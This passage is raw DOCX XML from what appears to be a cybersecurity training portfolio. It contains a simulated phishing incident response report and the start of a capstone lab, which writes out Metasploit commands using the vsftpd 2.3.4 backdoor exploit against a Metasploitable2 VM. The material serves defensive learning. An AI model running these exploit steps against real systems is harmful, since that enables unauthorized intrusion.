                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">* Ransomware Scenario Score: Likelihood=2 (Unlikely), Impact=4 (Major) → Score = 8 (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 7: Incident Response Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Template: SANS Incident Response | Incident ID: IR-2025-001 | Type: Phishing / Malware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On 2025-08-18 at 09:45 UTC, a simulated phishing attack was detected targeting a test endpoint within the mock organization environment. A crafted phishing email containing a malicious URL was delivered to a test mailbox. Upon the simulated user clicking the link, an encoded PowerShell payload executed, establishing a reverse shell to attacker-controlled IP 192.168.1.100. Wazuh detected the intrusion within 4 minutes. The endpoint was isolated within 22 minutes, eradicated within 2 hours, and restored to service within 4 hours. No real data was exfiltrated. Key gaps identified include lack of email sandbox technology and delayed automated containment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident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4000"/>
        <w:gridCol w:w="21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Timestamp (UTC)</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4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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Actor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09:45:00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Detection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Phishing email delivered to test mailbox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Attacker (simulated)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09:47:30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Detection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User clicked malicious link — payload executed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User (simulated)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09:49:12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Detection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Wazuh alert — suspicious PowerShell process spawned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Wazuh SIEM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09:51:00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Containment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SOC Analyst notified; triage initiated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SOC Tier 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10:07:00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Containment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Affected endpoint isolated at network switch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SOC Tier 2</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10:15:00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Eradication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Malicious process killed; persistence keys removed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SOC Tier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10:30:00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Eradication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Endpoint reimaged from verified clean golden image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SOC Engineer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11:45:00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Recovery</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Endpoint restored; user credentials reset; MFA enforced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SOC Engineer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12:00:00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Recovery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Systems verified clean; enhanced monitoring enabled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SOC Tier 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Steps &amp;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3000"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="196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Risk Level</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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>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No email sandbox / URL detonation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Deploy Proofpoint or Mimecast email sandbox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IT Security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Encoded PowerShell not alerted immediately</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HIGH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Tune Sigma rules to flag -EncodedCommand on creation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P1</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SOC Team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No MFA on test user accounts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Enforce MFA across all user accounts organization-wide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IT Admin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Manual containment process too slow</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MEDIUM</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Build SOAR playbook for automatic network isolation on P1 alerts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P2</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SOC Engineer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No deception layer in environment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LOW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Deploy honeypots on internal network segments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P3</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IT Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response Flow — Detection to Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[Phishing Email Delivered]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [User Clicks Link]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [Payload Executes: powershell.exe -EncodedCommand ...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [C2 Beacon: 192.168.1.100:443]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">         +---------&gt; [Wazuh Alert: Event 4688 + Sigma Rule Match]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [SOC Tier 1 Triage]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [Endpoint Isolated — VLAN change]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [CrowdSec blocks 192.168.1.100]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [Malware Removed + System Reimaged]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [Credentials Reset + MFA Enforced]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                              v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     [Monitoring Enhanced — Incident CLOSED]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 8: Capstone Project — Full Incident Response Cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Metasploit, Wazuh, CrowdSec, Velociraptor | Objective: Execute a full attack simulation, detect, contain, and produce a comprehensive incident report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Attack Simulation — Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Metasploitable2 VM (192.168.1.200) | Attacker: Kali Linux (192.168.1.100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Metasploit exploit execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set RHOSTS 192.168.1.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set RPORT 21</w:t>
      </w:r>
    </w:p>
